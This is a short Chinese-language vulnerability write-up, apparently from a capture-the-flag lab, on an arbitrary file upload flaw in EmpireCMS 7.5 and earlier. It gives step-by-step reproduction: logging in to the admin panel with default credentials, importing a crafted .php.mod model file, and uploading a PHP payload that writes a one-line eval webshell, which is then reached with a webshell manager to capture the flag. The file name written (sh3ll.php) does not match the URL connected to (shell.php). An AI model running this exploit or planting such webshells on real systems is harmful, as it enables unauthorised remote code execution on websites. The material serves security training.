一、漏洞描述
EmpireCMS 7.5版本及之前版本在后台备份数据库时,未对数据库表名做验证,通过修改数据库表名可以实现任意代码执行。EmpireCMS7.5版本中的/e/class/moddofun.php文件的”LoadInMod”函数存在安全漏洞,攻击者可利用该漏洞上传任意文件。
二、影响版本
EmpireCMS<=7.5
三、漏洞复现
- 进入靶场,登入后台 http://ip/empirecms/e/admin/,账号/密码:admin/123456。
系统->管理数据表->导入系统模型
2.上传*.php.mod文件,填写空格内容,选择马上导入,并确认:
<?php file_put_contents("sh3ll.php","<?php @eval(\$_POST[cmd]); ?>");?>
3.访问下看有没有成功解析
4.webshell管理工具连接http://ip/empirecms/e/admin/shell.php 密码cmd。
5.获取flag